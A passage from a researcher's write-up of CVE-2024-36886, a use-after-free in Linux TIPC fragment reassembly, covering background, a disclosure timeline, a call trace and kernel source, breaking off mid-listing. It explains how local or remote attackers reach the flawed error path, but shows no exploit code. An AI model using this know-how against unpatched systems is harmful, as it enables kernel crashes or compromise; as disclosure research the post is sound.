<p>In this post I&rsquo;m mainly going to be talking about the vulnerability itself, remediation and maybe I&rsquo;ll go a little bit into exploitation cos I can&rsquo;t help myself. If I can find the time, I&rsquo;d love to do a future post talking more about the discovery process and exploitation.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#overview">Overview</a>
<ul>
<li><a href="#timeline">Timeline</a></li>
</ul>
</li>
<li><a href="#background-stuff">Background Stuff</a>
<ul>
<li><a href="#net-basics">net/ Basics</a>
<ul>
<li><a href="#struct-skbuff">struct sk_buff</a></li>
<li><a href="#struct-skbsharedinfo">struct skb_shared_info</a></li>
</ul>
</li>
<li><a href="#tipc-primer">TIPC Primer</a></li>
</ul>
</li>
<li><a href="#the-vulnerability">The Vulnerability</a>
<ul>
<li><a href="#exploring-the-call-trace">Exploring The Call Trace</a></li>
<li><a href="#examining-tipcbufappend">Examining tipc_buf_append()</a></li>
<li><a href="#variations">Variations</a></li>
</ul>
</li>
<li><a href="#exploitation">Exploitation</a></li>
<li><a href="#fix-remediation">Fix + Remediation</a></li>
<li><a href="#wrapup">Wrapup</a></li>
</ul>
<h2 id="overview">Overview</h2>
<p>The vulnerability allows a local, or remote attacker, to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel.</p>
<p>Only systems with the TIPC module built (<code>CONFIG_TIPC=y</code>/<code>CONFIG_TIPC=m</code>) and loaded are vulnerable. Additionally, in order to be vulnerable to a remote attack the system must have TIPC configured on an interface reachable by an attacker.</p>
<p>The flaw exists in the implementation of TIPC message fragment reassembly, specifically <code>tipc_buf_append()</code>. The function carries out the reassembly by chaining the fragmented packet buffers together. It takes the first fragment as the head buffer and then processes subsequent fragments sequentially, adding their packet buffers onto the head buffer&rsquo;s chain.</p>
<p>The vulnerability occurs due to a missing check in the error handling cleanup. On error, the reassembly will bail, freeing both the head buffer (and its chained buffers) and the latest fragment buffer currently being processed. If the latest fragment buffer has already been added to the head buffer&rsquo;s chain at this point, it will lead to a use-after-free.</p>
<p>The vulnerability was introduced in commit <a href="https://github.com/torvalds/linux/commit/1149557d64c97dc9adf3103347a1c0e8c06d3b89">1149557d64c9</a> (Mar 2015) and fixed in commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a> (May 2024), affecting kernel versions 4 through to 6.8.</p>
<p>It was assigned <a href="https://www.zerodayinitiative.com/advisories/ZDI-24-821/">ZDI-24-821</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-36886">CVE-2024-36886</a> (shoutout to the insane description formatting on that one).</p>
<h3 id="timeline">Timeline</h3>
<ul>
<li>2024-03-23: Case opened with ZDI</li>
<li>2024-04-25: Case reviewed by ZDI</li>
<li>2024-04-25: Case disclosed to the vendor</li>
<li>2024-05-02: Fix published by the vendor</li>
<li>2024-06-20: Coordinated public release of ZDI advisory</li>
</ul>
<h2 id="background-stuff">Background Stuff</h2>
<p><img src="https://sam4k.com/content/images/2024/04/pepe_silvia.gif" alt=""></p>
<p>Before we dive into the juicy details, I&rsquo;m going to cover some background information to provide some additional context to the vulnerability. Feel free to skip this if you&rsquo;re already familiar with the networking subsystem and TIPC basics!</p>
<h3 id="net-basics"><code>net/</code> Basics</h3>
<p>So to kick things off lets try and give a bit of background on some of the networking subsystem fundamentals, as this is where the TIPC protocol is implemented!</p>
<p>I say try, because this subsystem is pretty complex and there&rsquo;s a lot of ground to cover. But in short, the networking subsystem does what it says on the tin: provides networking capability to the kernel. And it does it in way which is modular and extensible, providing a core API to implement various networking devices, protocols and interfaces.</p>
<h4 id="struct-skbuff"><code>struct sk_buff</code></h4>
<p>One of the fundamental structures that the kernel provides is <code>[struct sk_buff](https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L842)</code> which represents a network packet and its status. The structure is created when a kernel packet is received, either from the user space or from the network interface.<a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">[3]</a></p>
<p>The kernel documentation honestly does a great job unpacking this rather complicated structure, so I&rsquo;d recommend <a href="https://docs.kernel.org/networking/skbuff.html">checking that out</a> (up to the checksum section at least).</p>
<p>Essentially, <code>struct sk_buff</code> itself stores various metadata and the actual packet data is stored in associated buffers. A large part of the complexity surrounding the structure is how these buffers, and the relevant pointers to them, are accessed and manipulated.</p>
<h4 id="struct-skbsharedinfo"><code>struct skb_shared_info</code></h4>
<p>One of the features baked into this core API is packet fragmentation, the idea that a protocol&rsquo;s data may be split across several packets - so we have a situation where some data is fragmented across the data buffers of several <code>struct sk_buff</code>s.</p>
<p>This is where <code>[struct skb_shared_info](https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572)</code> comes in!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">/*</span> <span class="n">This</span> <span class="n">data</span> <span class="n">is</span> <span class="n">invariant</span> <span class="n">across</span> <span class="n">clones</span> <span class="ow">and</span> <span class="n">lives</span> <span class="n">at</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">the</span> <span class="n">end</span> <span class="n">of</span> <span class="n">the</span> <span class="n">header</span> <span class="n">data</span><span class="p">,</span> <span class="n">ie</span><span class="o">.</span> <span class="n">at</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">end</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="n">struct</span> <span class="n">skb_shared_info</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">meta_len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">nr_frags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">__u8</span>		<span class="n">tx_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="n">short</span>	<span class="n">gso_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Warning</span><span class="p">:</span> <span class="n">this</span> <span class="n">field</span> <span class="n">is</span> <span class="ow">not</span> <span class="n">always</span> <span class="n">filled</span> <span class="ow">in</span> <span class="p">(</span><span class="n">UFO</span><span class="p">)</span><span class="o">!</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="n">short</span>	<span class="n">gso_segs</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">sk_buff</span>	<span class="o">*</span><span class="n">frag_list</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">skb_shared_hwtstamps</span> <span class="n">hwtstamps</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="ne">int</span>	<span class="n">gso_type</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">u32</span>		<span class="n">tskey</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">Warning</span> <span class="p">:</span> <span class="n">all</span> <span class="n">fields</span> <span class="n">before</span> <span class="n">dataref</span> <span class="n">are</span> <span class="n">cleared</span> <span class="ow">in</span> <span class="n">__alloc_skb</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">atomic_t</span>	<span class="n">dataref</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="ne">int</span>	<span class="n">xdp_frags_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Intermediate</span> <span class="n">layers</span> <span class="n">must</span> <span class="n">ensure</span> <span class="n">that</span> <span class="n">destructor_arg</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">remains</span> <span class="n">valid</span> <span class="n">until</span> <span class="n">skb</span> <span class="n">destructor</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">void</span> <span class="o">*</span>		<span class="n">destructor_arg</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">must</span> <span class="n">be</span> <span class="n">last</span> <span class="n">field</span><span class="p">,</span> <span class="n">see</span> <span class="n">pskb_expand_head</span><span class="p">()</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">skb_frag_t</span>	<span class="n">frags</span><span class="p">[</span><span class="n">MAX_SKB_FRAGS</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572">include/linux/skbuff.h</a> (6.7.4)</p>
<p>Among other things, this allows a packet to keep track of its fragments! Relevant to us is <code>frag_list</code>, used to link <code>struct sk_buff</code> headers together for reassembly.</p>
<h3 id="tipc-primer">TIPC Primer</h3>
<p>Transparent Inter Process Communication (TIPC) is an IPC mechanism designed for intra-cluster communication, originating from Ericsson where it has been used in carrier grade cluster applications for many years. Cluster topology is managed around the concept of nodes and the links between these nodes.</p>
<p>TIPC communications are done over a &ldquo;bearer&rdquo;, which is a TIPC abstraction of a network interface. A &ldquo;media&rdquo; is a bearer type, of which there are four currently supported: Ethernet, Infiniband, UDP/IPv4 and UDP/IPv6.</p>
<p>A local attacker is able to set up a UDP bearer as an unprivileged user via netlink, as demonstrated by bl@sty during his work on CVE-2021-43267<a href="https://haxx.in/posts/pwning-tipc/">[1]</a>. However, a remote attacker is restricted by whatever bearers are already set up on a system.</p>
<p>TIPC messages have their own header, of which there are several formats outlined in the specification<a href="http://tipc.io/protocol.html">[2]</a>. A common theme is the concept of message &ldquo;user&rdquo; which defines their purpose (see &ldquo;Figure 4: TIPC Message Types&rdquo;<a href="http://tipc.io/protocol.html">[2]</a>) and can be used to infer the format of the TIPC message.</p>
<p>There is a handshake to establish a link between nodes (see &ldquo;Link Creation&rdquo;<a href="http://tipc.io/protocol.html">[2]</a>). An established link is required to reach the vulnerable code. This essentially involves sending three messages to: advertise the node, reset the state and then set the state.</p>
<hr>
<ol>
<li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a></li>
<li><a href="http://tipc.io/protocol.html">TIPC Protocol Documentation</a></li>
<li><a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking</a></li>
<li><a href="https://docs.kernel.org/networking/skbuff.html">https://docs.kernel.org/networking/skbuff.html</a></li>
</ol>
<h2 id="the-vulnerability">The Vulnerability</h2>
<p><img src="https://sam4k.com/content/images/2024/04/here_we_go.gif" alt=""></p>
<p>🤓</p>
<p>For this example I&rsquo;m going to be using assuming a local attacker interacting with message fragmentation over a UDP bearer, after establishing a link, on a 6.7.4 kernel.</p>
<p>The TIPC protocol features message fragmentation, where a single TIPC message can be split into fragments and sent to its destination via several packets:  </p>
<blockquote>
<p>When a message is longer than the identified MTU of the link it will use, it is split up in fragments, each being sent in separate packets to the destination node. Each fragment is wrapped into a packet headed by an TIPC internal header [&hellip;] The User field of the header is set to MSG_FRAGMENTER, and each fragment is assigned a Fragment Number relative to the first fragment of the message. Each fragmented message is also assigned a Fragmented Message Number, to be present in all fragments. [&hellip;] At reception the fragments are reassembled so that the original message is recreated, and then delivered upwards to the destination port. [1]</p>
</blockquote>
<p>So essentially, each fragment is wrapped up in a TIPC fragment message (a message with the <code>MSG_FRAGMENTER</code> user). Each of these fragment messages will provide metadata in its header, such as the fragment number, so that the fragment within can be reassembled in the right order on the receiving end.</p>
<p><img src="https://sam4k.com/content/images/2024/07/frags_example-4.png" alt=""></p>
<h3 id="exploring-the-call-trace">Exploring The Call Trace</h3>
<p>Let&rsquo;s take a look at the kernel call trace for a <code>MSG_FRAGMENTER</code> message being received by a TIPC UDP bearer. This gives us a bit of context about how the TIPC networking stack handles incoming packets:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#0 tipc_link_input+0x41b/0x850 net/tipc/link.c:1339
</span></span><span class="line"><span class="cl">#1 tipc_link_rcv+0x77a/0x2dc0 net/tipc/link.c:1839
</span></span><span class="line"><span class="cl">#2 tipc_rcv+0x519/0x3030 net/tipc/node.c:2159
</span></span><span class="line"><span class="cl">#3 tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
</span></span><span class="line"><span class="cl">#4 udp_queue_rcv_one_skb+0xe76/0x19b0 net/ipv4/udp.c:2113
</span></span><span class="line"><span class="cl">#5 udp_queue_rcv_skb+0x136/0xa60 net/ipv4/udp.c:2191
</span></span></code></pre></div><p>#5 &amp; #4 show the underlying UDP networking stack stuff. #3 is where TIPC first receives inbound TIPC-over-UDP messages, which does some basic bearer level checks before handing the <code>skb</code> over to #2, <code>tipc_rcv()</code>.</p>
<p>After bearer level checks, all inbound TIPC packets are processed by #2, <code>tipc_rcv()</code>. This involves sanity checks on TIPC header values and using a combination of message user and link state to figure out how the packet is going to be processed.</p>
<p>A valid <code>MSG_FRAGMENTER</code> message is received by #1, <code>tipc_link_rcv()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">tipc_link_rcv</span><span class="p">(</span><span class="k">struct</span> <span class="n">tipc_link</span> <span class="o">*</span><span class="n">l</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">          <span class="k">struct</span> <span class="n">sk_buff_head</span> <span class="o">*</span><span class="n">xmitq</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">sk_buff_head</span> <span class="o">*</span><span class="n">defq</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">deferdq</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">tipc_msg</span> <span class="o">*</span><span class="n">hdr</span> <span class="o">=</span> <span class="nf">buf_msg</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="n">u16</span> <span class="n">seqno</span><span class="p">,</span> <span class="n">rcv_nxt</span><span class="p">,</span> <span class="n">win_lim</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">released</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">rc</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Verify and update link state */</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="nf">msg_user</span><span class="p">(</span><span class="n">hdr</span><span class="p">)</span> <span class="o">==</span> <span class="n">LINK_PROTOCOL</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="nf">tipc_link_proto_rcv</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Don&#39;t send probe at next timeout expiration */</span>
</span></span><span class="line"><span class="cl">    <span class="n">l</span><span class="o">-&gt;</span><span class="n">silent_intv_cnt</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">do</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="n">hdr</span> <span class="o">=</span> <span class="nf">buf_msg</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="n">seqno</span> <span class="o">=</span> <span class="nf">msg_seqno</span><span class="p">(</span><span class="n">hdr</span><span class="p">);</span>                                                 <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">rcv_nxt</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">;</span>                                                   <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">win_lim</span> <span class="o">=</span> <span class="n">rcv_nxt</span> <span class="o">+</span> <span class="n">TIPC_MAX_LINK_WIN</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">link_is_up</span><span class="p">(</span><span class="n">l</span><span class="p">)))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">==</span> <span class="n">LINK_ESTABLISHING</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="n">rc</span> <span class="o">=</span> <span class="n">TIPC_LINK_UP_EVT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nf">kfree_skb</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="cm">/* Drop if outside receive window */</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="nf">less</span><span class="p">(</span><span class="n">seqno</span><span class="p">,</span> <span class="n">rcv_nxt</span><span class="p">)</span> <span class="o">||</span> <span class="nf">more</span><span class="p">(</span><span class="n">seqno</span><span class="p">,</span> <span class="n">win_lim</span><span class="p">)))</span> <span class="p">{</span>           <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">            <span class="n">l</span><span class="o">-&gt;</span><span class="n">stats</span><span class="p">.</span><span class="n">duplicates</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nf">kfree_skb</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">        <span class="n">released</span> <span class="o">+=</span> <span class="nf">tipc_link_advance_transmq</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="nf">msg_ack</span><span class="p">(</span><span class="n">hdr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                              <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="cm">/* Defer delivery if sequence gap */</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="n">seqno</span> <span class="o">!=</span> <span class="n">rcv_nxt</span><span class="p">))</span> <span class="p">{</span>                                       <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">__tipc_skb_queue_sorted</span><span class="p">(</span><span class="n">defq</span><span class="p">,</span> <span class="n">seqno</span><span class="p">,</span> <span class="n">skb</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">                <span class="n">l</span><span class="o">-&gt;</span><span class="n">stats</span><span class="p">.</span><span class="n">duplicates</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_build_nack_msg</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="cm">/* Deliver packet */</span>
</span></span><span class="line"><span class="cl">        <span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">l</span><span class="o">-&gt;</span><span class="n">stats</span><span class="p">.</span><span class="n">recv_pkts</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="nf">msg_user</span><span class="p">(</span><span class="n">hdr</span><span class="p">)</span> <span class="o">==</span> <span class="n">TUNNEL_PROTOCOL</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_tnl_rcv</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">inputq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">tipc_data_input</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">inputq</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_input</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">inputq</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">reasm_buf</span><span class="p">);</span>            <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">++</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_unacked</span> <span class="o">&gt;=</span> <span class="n">TIPC_MIN_LINK_WIN</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">rc</span> <span class="o">|=</span> <span class="nf">tipc_link_build_state_msg</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="n">rc</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">TIPC_LINK_SND_STATE</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">while</span> <span class="p">((</span><span class="n">skb</span> <span class="o">=</span> <span class="nf">__tipc_skb_dequeue</span><span class="p">(</span><span class="n">defq</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">)));</span>                     <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Forward queues and wake up waiting users */</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">released</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">tipc_link_update_cwin</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">released</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="nf">tipc_link_advance_backlog</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">xmitq</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">skb_queue_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">wakeupq</span><span class="p">)))</span>
</span></span><span class="line"><span class="cl">            <span class="nf">link_prepare_wakeup</span><span class="p">(</span><span class="n">l</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1786">net/tipc/link.c</a> (6.7.4)</p>
<p><code>tipc_link_rcv()</code> uses the sequence number, pulled from the TIPC message header [0], to determine the order in which to process the incoming <code>skb</code>s. It uses <code>struct tipc_link</code> to manage the link state, including what <code>seqno</code> it&rsquo;s expecting next [1].</p>
<p>Out of order packets are either dropped [2] or added to the defer queue, <code>defq</code>, for later [3] [4]. When the correct <code>seqno</code> is hit, it will do some checks to see how to process it. When the user is <code>MSG_FRAGMENTER</code>, the packet is passed to #0 <code>tipc_link_input()</code> [5].</p>
<p><code>tipc_link_input()</code>, #0, processes the packet depending on the user:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">static int tipc_link_input(struct tipc_link *l, struct sk_buff *skb,
</span></span><span class="line"><span class="cl">               struct sk_buff_head *inputq,
</span></span><span class="line"><span class="cl">               struct sk_buff **reasm_skb)
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    // snip
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    } else if (usr == MSG_FRAGMENTER) {
</span></span><span class="line"><span class="cl">        l-&gt;stats.recv_fragments++;
</span></span><span class="line"><span class="cl">        if (tipc_buf_append(reasm_skb, &amp;skb)) {
</span></span><span class="line"><span class="cl">            l-&gt;stats.recv_fragmented++;
</span></span><span class="line"><span class="cl">            tipc_data_input(l, skb, inputq);
</span></span><span class="line"><span class="cl">        } else if (!*reasm_skb &amp;&amp; !link_is_bc_rcvlink(l)) {
</span></span><span class="line"><span class="cl">            pr_warn_ratelimited(&#34;Unable to build fragment list\n&#34;);
</span></span><span class="line"><span class="cl">            return tipc_link_fsm_evt(l, LINK_FAILURE_EVT);
</span></span><span class="line"><span class="cl">        }
</span></span><span class="line"><span class="cl">        return 0;
</span></span><span class="line"><span class="cl">    } // snip
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">    kfree_skb(skb);
</span></span><span class="line"><span class="cl">    return 0;
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1319">net/tipc/link.c</a> (6.7.4)</p>
<h3 id="examining-tipcbufappend">Examining <code>tipc_buf_append()</code></h3>
<p>This function is the root cause of the vulnerability. <code>tipc_buf_append()</code> is used to append the buffers containing message fragments, in order to reassemble the original message:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cm">/* tipc_buf_append(): Append a buffer to the fragment list of another buffer
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @*headbuf: in:  NULL for first frag, otherwise value returned from prev call
</span></span></span><span class="line"><span class="cl"><span class="cm"> *            out: set when successful non-complete reassembly, otherwise NULL
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @*buf:     in:  the buffer to append. Always defined
</span></span></span><span class="line"><span class="cl"><span class="cm"> *            out: head buf after successful complete reassembly, otherwise NULL
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Returns 1 when reassembly complete, otherwise 0
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">tipc_buf_append</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">headbuf</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">buf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">head</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">frag</span> <span class="o">=</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">tipc_msg</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">u32</span> <span class="n">fragid</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">delta</span><span class="p">;</span>
